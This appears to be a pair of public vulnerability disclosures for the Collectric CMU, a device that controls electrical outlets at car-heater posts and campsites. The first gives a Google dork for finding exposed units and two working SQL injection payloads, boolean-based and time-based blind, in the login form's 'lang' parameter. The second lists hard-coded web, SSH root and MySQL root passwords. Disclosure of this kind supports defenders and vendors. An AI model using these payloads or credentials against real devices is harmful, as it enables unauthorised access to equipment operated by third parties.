# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection# Google Dork: "Inloggning Collectric CMU"# Discoverer: Simon Brannstrom# Date: 2018-09-15# Vendor Homepage: http://ourenergy.se/# Software Link: n/a# Version: All known versions# Tested on: Linux# CVE: N/A# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, # camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface. # More vulnerabilities exists, see my other vulnerability reports.# Parameter: lang (GET)# Type: boolean-based blind# Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in# Type: AND/OR time-based blind# Title: MySQL >= 5.0.12 AND time-based blind
Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.# Discoverer: Simon Brannstrom# Date: 09/15/2018# Vendor Homepage: http://ourenergy.se/# Software Link: n/a# Version: All known versions# Tested on: Linux# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
More vulnerabilities exists, see my other vulnerability reports.---
Web Portal hard-coded credentials:
username: sysadmin
password: zoogin
SSH user/root credentials:
username: kplc
password: kplc
username: root
password: zoogin
*The SSH server is running Dropbear sshd 0.52(protocol 2.0) which requires diffie-hellman-group1-sha1.
MySQL root credentials:
username: root
password: sql4u
---
